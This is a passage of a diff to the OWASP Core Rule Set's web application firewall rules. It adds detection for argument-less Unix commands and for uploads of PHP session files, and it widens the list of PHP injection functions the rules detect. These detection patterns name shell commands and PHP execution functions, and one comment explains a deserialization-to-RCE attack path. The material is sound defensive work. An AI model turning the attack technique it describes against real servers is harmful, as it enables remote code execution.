b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s)|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|[\s\x0b&\),<>\|].*))" \ "id:932238,\ phase:2,\ block,\ @@ -1878,7 +1962,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1914,11 +1998,71 @@ SecRule ARGS "@rx /(?:[?*]+[a-z/]+|[a-z/]+[?*]+)" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" +# [ Unix command injection ] +# +# This rule is meant to block the execution of commands with no arguments when it's possible to meaningfully do so. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932350.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932350 +# +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:aptitud|unam)e|d(?:f|ir|mesg)|env|h(?:istory|ostname|top)|i(?:d|ostat)|l(?:ast|s)|mysql(?:[^\s\x0b]{1,10}\b)?|p(?:s(?:ql)?|wd)|(?:reboo|vmsta)t|s(?:(?:cree|hutdow)n|et|u)|top|w(?:ho(?:ami|is)?)?)$" \ + "id:932350,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Direct Unix Command Execution (No Arguments)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'OWASP_CRS/ATTACK-RCE',\ + tag:'capec/1000/152/248/88',\ + ver:'OWASP_CRS/4.23.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # -=[ SMTP commands ]=- # @@ -1949,7 +2093,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n.* tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/137/134',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1983,7 +2127,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/137/134',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -2017,7 +2161,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n.* tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/137/134',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -2051,14 +2195,14 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx !(?:\d tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf index a950395a33..cab7ebe9fd 100644 --- a/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf +++ b/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -60,7 +60,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)<\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -102,7 +102,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -123,7 +123,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b capture,\ t:none,t:normalizePath,\ msg:'PHP Injection Attack: Configuration Directive Found',\ - logdata:'Matched Data: %{TX.0} found within %{TX.933120_MATCHED_VAR_NAME}: %{TX.933120_MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ @@ -132,10 +132,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ - setvar:'tx.933120_matched_var=%{MATCHED_VAR}',\ - setvar:'tx.933120_matched_var_name=%{MATCHED_VAR_NAME}',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -159,7 +157,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFil tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -191,7 +189,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -228,7 +226,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)ph tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -265,7 +263,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:bzi tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -281,13 +279,13 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:bzi # The list of PHP functions is divided into four groups of varying attack/false positive risk. # Four separate rules are used to detect these groups of functions: # -# - Rule 933150: ~237 words highly common to PHP injection payloads and extremely rare in +# - Rule 933150: ~234 words highly common to PHP injection payloads and extremely rare in # natural language or other contexts. # Examples: 'base64_decode', 'file_get_contents'. # These words are detected as a match directly using @pmFromFile. # Function names are defined in php-function-names-933150.data # -# - Rule 933160: ~36 words which are common in PHP code, but have a higher chance to cause +# - Rule 933160: ~39 words which are common in PHP code, but have a higher chance to cause # false positives in natural language or other contexts. # Examples: 'chr', 'eval'. # To mitigate false positives, a regexp looks for PHP function syntax, e.g. 'eval()'. @@ -314,8 +312,10 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:bzi # # Rule 933150 contains a small list of function names which are highly indicative of a PHP # injection attack, for example 'base64_decode'. -# We block these function names outright, without using a complex regexp or chain. -# This could make the detection a bit more robust against possible bypasses. +# The rule uses a chained rule to require parentheses after function names. +# This prevents false positives from substring matches (e.g., "intval" in "PaintValdosta"). +# Functions that commonly appear as English words/substrings are handled by rule 933160 +# with stricter regex-based function call syntax validation. # SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933150.data" \ "id:933150,\ @@ -333,10 +333,13 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ - setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + chain" + SecRule MATCHED_VARS "@pm ( )" \ + "t:none,\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -370,7 +373,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 933160 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b\(?[\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|f(?:ile(?:group)?|open|puts)|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a)|m(?:d5|kdir)|o(?:pendir|rd)|p(?:assthru|open|r(?:intf|ev))|r(?:eadfile|trim)|s(?:t(?:rip_tags|at)|ubstr|ystem)|tmpfile|u(?:n(?:pac|lin)k|sort))(?:/(?:\*.*?\*/|/[^\n\r]*)|#[^\n\r]*|[\s\x0b\"])*[\"']*\)?[\s\x0b]*\([^\)]*\)" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b\(?[\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|f(?:ile(?:group)?|open|puts)|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a|ntval)|m(?:d5|kdir)|o(?:pendir|rd)|p(?:assthru|hpinfo|open|r(?:intf|ev))|r(?:eadfile|trim)|s(?:t(?:rip_tags|at)|ubstr|ystem)|tmpfile|u(?:n(?:(?:pac|lin)k|serialize)|sort))(?:/(?:\*.*?\*/|/[^\n\r]*)|#[^\n\r]*|[\s\x0b\"])*[\"']*\)?[\s\x0b]*\([^\)]*\)" \ "id:933160,\ phase:2,\ block,\ @@ -386,7 +389,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -442,7 +445,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|ARGS_NAMES|ARGS|XM tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -498,7 +501,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -546,13 +549,71 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Session File Upload Protection ] +# +# Detects attempts to upload files matching PHP session naming patterns. +# PHP session files typically follow the pattern: sess_ +# where session_id is typically 20-256 characters (varies by PHP version). +# Example sizes: +# 32 chars — MD5 hash (legacy default) +# 40 chars — SHA-1 hash +# 26 chars — MD5 with 5 bits/character encoding +# +# Modern PHP (7.1+) +# PHP 7.1+ uses session.sid_length (default 32, range 22–256) and session.sid_bits_per_character: +# +# | Bits/char | Character set | Regex | +# | 4 | 0-9a-f | [0-9a-f]{22,256} | +# | 5 | 0-9a-v | [0-9a-v]{22,256} | +# | 6 | 0-9a-zA-Z,- | [0-9a-zA-Z,-]{22,256} | +# +# Attackers can upload malicious serialized PHP objects with session filenames, +# then trigger deserialization by presenting a matching PHPSESSID cookie, leading +# to Remote Code Execution through PHP object injection. +# +# References: +# - CVE-2025-54236 (Magento - Session Reaper) +# - https://slcyber.io/assetnote-security-research-center/why-nested-deserialization-is-still-harmful-magento-rce-cve-2025-54236/ +# +# This rule blocks: +# - sess_abcdef1234567890opqrstxyz (standard session file) +# - /tmp/sess_d8ew88tqmabdcokhumchy8htqm (with path) +# - C:\temp\sess_maliciousfilename1234567890 (Windows path) +# +# Some AJAX uploaders use the nonstandard request headers X-Filename, +# X_Filename, or X-File-Name to transmit the file name to the server; +# scan these request headers as well as multipart/form-data file names. +# +SecRule FILES|FILES_NAMES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx (?:^|[/\x5c])sess_[,\-0-9a-z]{20,256}$" \ + "id:933220,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'PHP Injection Attack: PHP Session File Upload Attempt',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'OWASP_CRS/ATTACK-PHP',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" 